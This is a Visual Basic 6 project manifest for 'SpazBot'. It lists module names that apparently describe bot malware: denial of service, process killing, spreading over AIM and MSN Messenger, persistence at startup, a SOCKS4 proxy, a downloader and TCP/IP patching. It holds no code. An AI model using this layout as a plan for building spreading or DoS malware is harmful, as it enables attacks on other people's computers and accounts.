Type=Exe
Reference=*\G{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}#1.1#0#C:\WINDOWS\system32\oleacc.dll#Accessibility
Reference=*\G{E02AD29E-80F5-46C6-B416-9B3EBDDF057E}#1.0#0#c:\program files\msn messenger\msnmsgr.exe\2#Messenger API Type Library
Form=frmMain.frm
Module=modData; modData.bas
Module=modMain; modMain.bas
Module=modCommands; modCommands.bas
Module=modDNS; modDNS.bas
Module=modStartup; modStartup.bas
Module=modSettings; modSettings.bas
Module=modDoS; modDoS.bas
Module=modSysInfo; modSysInfo.bas
Module=modKillStuff; modKillStuff.bas
Module=modEncrypt; modEncrypt.bas
Class=clsExitWindows; clsExitWindows.cls
Module=modMD5; modMD5.bas
Module=modFileSearch; modFileSearch.bas
Module=modMutex; modMutex.bas
Module=modKillProc; modKillProc.bas
Module=modSocketPlus; modSocketPlus.bas
Class=clsSocketPlus; clsSocketPlus.cls
Class=clsStringBuilder; clsStringBuilder.cls
Module=modDOSOutput; modDOSOutput.bas
Module=modCPUSpeed; modCPUSpeed.bas
Class=clsCPUID; clsCPUID.cls
Module=modShellExec; modShellExec.bas
Module=modRegistry; modRegistry.bas
UserControl=ctlSocks4.ctl
UserControl=ctlDownload.ctl
Module=modCRC32; modCRC32.bas
Module=modPatchTCPIP; modPatchTCPIP.bas
Module=modHomepage; modHomepage.bas
Module=modAccessibility; modAccessibility.bas
Module=modSpreadAIM; modSpreadAIM.bas
Module=modSpreadMSN; modSpreadMSN.bas
ResFile32="resources.RES"
IconForm="frmMain"
Startup="Sub Main"
HelpFile=""
ExeName32="s.exe"
Path32="C:\"
Command32=""
Name="SpazBot"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="Organization"
CompilationType=-1
OptimizationType=1
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1
